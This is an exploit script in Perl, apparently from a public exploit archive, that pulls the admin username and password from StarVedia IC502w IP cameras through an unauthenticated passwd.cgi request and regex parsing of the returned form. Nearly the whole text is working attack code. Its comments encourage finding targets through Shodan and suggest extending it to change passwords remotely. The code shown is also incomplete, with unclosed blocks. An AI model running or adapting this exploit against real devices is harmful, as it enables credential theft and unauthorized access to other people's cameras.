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StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure

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# [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit
# Author: Todor Donev
# Email: todor.donev at gmail dot com
# Type: Hardware
# Thanks to Tsvetelina Emirska the best friend in my life
# and all my other friends for the help and support which
# gives me. Kind regards to all of you, who read my lil'
# exploits.
# Bulgaria, Sofia
# 03.2013
# Shodanhq r0x 4 teh lulz!!
# http://www.youtube.com/watch?v=qNyN1AY-YZQ Cheeerzz
# Another bug, hint: you can edit this code and add some lines for remote change the password.

use LWP::Simple;
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-d") {
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!\n");
print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n";
print " [!] Exploiting: $t\n";
if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
$result .= " [o] User: $1\n";
}else{die(" Try another exploit, $!");}
if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){
$result .= " [o] Password: $1\n";
}else{die("Try another exploit or restart the exploit\n");}
print " [\\m/] BINGO!!!\n\a".$result;
sub usg(){
print " [!] usg: perl $0 [-r or -d] <victim:port>\n";
print " [!] -d: disclosure password option\n";
print " [!] exp: perl $0 -d \n";

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